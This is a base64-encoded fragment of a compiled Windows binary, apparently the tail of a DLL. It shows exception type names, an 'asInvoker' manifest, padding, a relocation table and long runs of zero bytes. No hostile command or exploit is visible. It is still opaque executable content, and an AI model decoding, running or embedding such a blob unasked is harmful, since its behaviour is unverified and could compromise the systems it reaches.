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AAADwAABIAAAAPjCUMfsxOzJ7Mqoy4jIKMzozajPLMws0QjRdNGc0cTR+NIM0iTSNNJI0mDSlNKo0tDTBNMU0yjTUNN406TTtNAAAAQDwAAAAjDGQMZQxoDGkMagxrDG4Mbwx/DEAMggyDDIQMhQyGDJIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6TDpQOlQ6WDpcOmA6ZDpoOmw6cDp0Ong6fDqAOoQ6iDqMOpA6lDqYOpw6oDqkOqg6rDqwOrQ6uDq8OsA6xDrMOtA61DoAAAAQAQAgAAAAsDu0O7g7vDvAO8Q7yDvMO9A71DvYOwAAACABAGQAAADQPNQ82DzcPCw9MD2oPaw9vD3APcg94D3wPfQ9BD4IPgw+FD4sPjA+SD5YPlw+cD50PoQ+iD6YPpw+oD6oPsA+PD9AP2A/gD+IP5A/mD+cP6Q/uD/AP9Q/8D8AAAAwAQC8AAAAEDAwMFAwXDB4MIQwoDC8MMAw4DD8MAAxIDFAMWAxgDGgMcAx3DHgMfwxADIcMiAyQDJcMmAygDKgMsAy4DLsMggzKDNIM2QzaDNwM4wznDOkM7Az0DPcM/wzCDQoNDQ0VDRcNGg0iDSUNLQ0wDTgNOw0DDUUNRw1JDUwNVA1XDV8NYQ1kDXINdA11DXsNfA1ADYkNjA2ODZoNnA2dDaMNpA2rDawNrg2wDbINsw21DboNgAAAFABAPwAAAAAMAQwoDGwMbQx0DEYNhA3eDeIN5g3qDe4N9w36DfsN/A39Df4NwA4BDgQOJA5lDmYOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6WDpgOmQ6aDpsOnA6dDp4Onw6gDqEOpA6oDqoOiA9JD0oPSw9MD00PTg9PD1APUQ9SD1MPVQ9XD1kPWw9dD18PYQ9jD2UPZw9pD2sPbQ9vD3EPcw91D3cPeQ97D30Pfw9BD6wPrQ+YD+AP4Q/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA